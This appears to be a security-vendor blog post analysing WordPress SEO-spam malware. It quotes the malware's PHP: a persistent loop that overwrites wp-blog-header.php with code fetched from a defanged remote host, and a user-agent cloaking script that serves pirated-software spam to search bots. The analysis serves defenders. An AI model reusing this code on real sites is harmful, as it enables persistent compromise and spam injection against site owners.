During a recent incident response investigation, we detected an infected website loading spam content from another location. The malware was responsible for fetching the spam and displaying it on the front page without the client’s knowledge or consent.
Let’s break down the infection and work through it step by step.
First, the malware sets the ignore_user_abort function to true in order to ensure that the user cannot stop the file execution and that the file will not time out by setting the set_time_limit to 0.
<html><body>Nic No Removed Ver0.5<?php ignore_user_abort(true); set_time_limit(0);
Then an infinite loop checks and recreates the malicious file over and over again. After the loop has started, it will kick off the next phase and check if the wp-blog-header.php file is writeable. This file was not arbitrarily chosen; wp-blog-header.php is a WordPress core file, which means that the malware will be successfully loaded every time the blog is accessed. Afterwards, it replaces the original core file with an infected version fetched from a remote location.
while(1){ $path ="/var/www/vhosts/site.com/httpdocs/wp-blog-header.php"; if (is_writable($path) == false) { unlink ($path);echo "del" ; chmod($path,0777);}file_put_contents($path,file_get_contents(“hXXp://ga-google[.]com/Nic/feng/infecteddomain.txt“));
This infected domain.txt contains a similar copy of the core file “wp-blog-header.php” but is injected with a typical spam-seo malware. The interesting part is that the attacker had a file for every site infected with his malicious code.
As you can see in the following code snippet, it checks for the user-agent and creates links to this pirated Windows site if it’s the search engine rendering the page.
<?php$tmp = strtolower($_SERVER['HTTP_USER_AGENT']); $mysite = "http://victm-site.dom/"; $filename = ""; $fromsite = "hxxp://windowsiso[.]net/windows-7-iso/windows-7-download/professional-iso-7/";if (strpos($tmp, 'google') !== false || strpos($tmp, 'yahoo') !== false || strpos($tmp, 'aol') !== false || strpos($tmp, 'sqworm') !== false || strpos($tmp, 'bot') !== false) { $ksite = !empty($_GET['p']) ? $_GET['p'] : ""; $list = array( ); $listname = $filename . "?p="; $liststr = "<div style='text-align: center'>"; foreach ($list as $key => $val) { if ($ksite == $key) { $fromsite = $val; } $liststr .= "<a href='" .$mysite . $filename . "?p=" . $key . "'>" . $key . "</a> "; } $liststr .= "</div>"; $url = empty($_GET['viewid']) ? "" : $_GET['viewid']; $content = file_get_contents($fromsite . $url); if (!empty($ksite)) { $qstr = $filename . "?p=" . $ksite . "&viewid="; } else { $qstr = $filename . "?viewid="; } $repstr = $mysite . $qstr; $content = str_ireplace('href="', 'href="/', $content); $content = str_ireplace('href="//', 'href="/', $content);This type of Malware is very common and can be used to inject many types of spam content into your website,causing an impact on your site’s SERP (Search Engine Result Pages). If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.
Krasimir Konov
Luke Leal
Juliana Lewis
Denis Sinegubko
Alycia Mitchell
Fioravante Souza
Antony Garand
Art Martori
Daniel Cid